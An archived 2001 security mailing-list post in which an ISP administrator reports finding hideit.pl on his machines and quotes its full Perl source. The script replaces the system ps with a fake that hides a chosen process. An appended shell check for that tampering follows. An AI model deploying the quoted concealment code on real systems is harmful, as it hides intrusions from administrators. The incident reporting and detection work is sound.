hideit.pl hides any program from ps?!

From: Richard Collins (braingain88at_private)
Date: Sun Aug 12 2001 - 11:08:12 PDT


    Hi. I'm an admin of a small ISP. I found this program on all my workstations.
    It was called hideit.pl. It seems to hide any program from ps!
    
    
    #This little perl script will replace the ps program with a fake ps #that
    #doesn't show the program u want to hide, the original ps replaced #will be 
    saved
    #in /bin/ps.bak and can be restored by running:ps2.pl Restore
    #stupid but usefull!;)
    #by SLACKo from Dalnet
    #!/usr/bin/perl
    if ($#ARGV<0) {die "Usage : $0 Program (To hide a program from ps) or
            $0 Restore (To restore ps)\n"};
    $eshta = `whereis ps` =~ /^\S+:\s+(\S+)/;$new=$1;
    restore() if ($ARGV[0] eq "Restore");
    system("cp $new /bin/ps.bak") if (! -f '/bin/ps.bak');
    open(HH,">$new") or die "$!\n";
    $string = <<"EOF";
    #!/usr/bin/perl
    open(PS,"/bin/ps.bak \$ARGV[0]|") or die "$!\n";
    while (<PS>) {
    s/perl(.*)bin(.*)/ps \$ARGV[0]/g;
    next if (/($ARGV[0]|ps.bak)/);
    print;}
    EOF
    print HH "$string";close(HH,PS);
    sub restore {system("cp /bin/ps.bak $new");exit;}
    
    
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Sun Aug 12 2001 - 16:48:53 PDT
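
A defensive check for the replacement that the posted script's comments describe (ps swapped for a Perl wrapper, with the original saved as /bin/ps.bak). This is an added example, not part of the original message; the function names `is_elf` and `check_ps` are hypothetical, and it assumes a Linux host where the genuine ps is an ELF binary.

```shell
#!/bin/sh
# Added example: flag a ps that has been swapped for a script wrapper.
# check_ps status: 0 = no indicators, 1 = indicators found, 2 = cannot check.

# Succeeds if the file starts with the 4-byte ELF magic (0x7f 'E' 'L' 'F').
is_elf() {
    magic=$(dd if="$1" bs=4 count=1 2>/dev/null | od -An -tx1 | tr -d ' \n')
    [ "$magic" = "7f454c46" ]
}

# check_ps PS_PATH BACKUP_PATH
check_ps() {
    ps_path=$1
    backup=$2
    found=0
    [ -r "$ps_path" ] || { echo "cannot read $ps_path"; return 2; }

    # Indicator 1: the installed ps is not a native binary.
    if ! is_elf "$ps_path"; then
        echo "INDICATOR: $ps_path is not an ELF binary"
        found=1
        # Indicator 2: it is an interpreter script that names the saved copy.
        if [ "$(dd if="$ps_path" bs=2 count=1 2>/dev/null)" = "#!" ] &&
           grep -qF -- "$(basename "$backup")" "$ps_path"; then
            echo "INDICATOR: $ps_path is a script referencing $(basename "$backup")"
        fi
    fi

    # Indicator 3: a saved copy of ps sits at the backup path.
    if [ -f "$backup" ]; then
        echo "INDICATOR: $backup exists"
        found=1
        is_elf "$backup" && echo "NOTE: $backup is an ELF binary (likely the displaced ps)"
    fi
    return "$found"
}

# Typical call on a live host (path taken from the script's own comments):
#   check_ps "$(command -v ps)" /bin/ps.bak
```

A hit from this check is a reason to verify the system binaries against known-good copies, since the tool doing the checking runs on the same host that was modified.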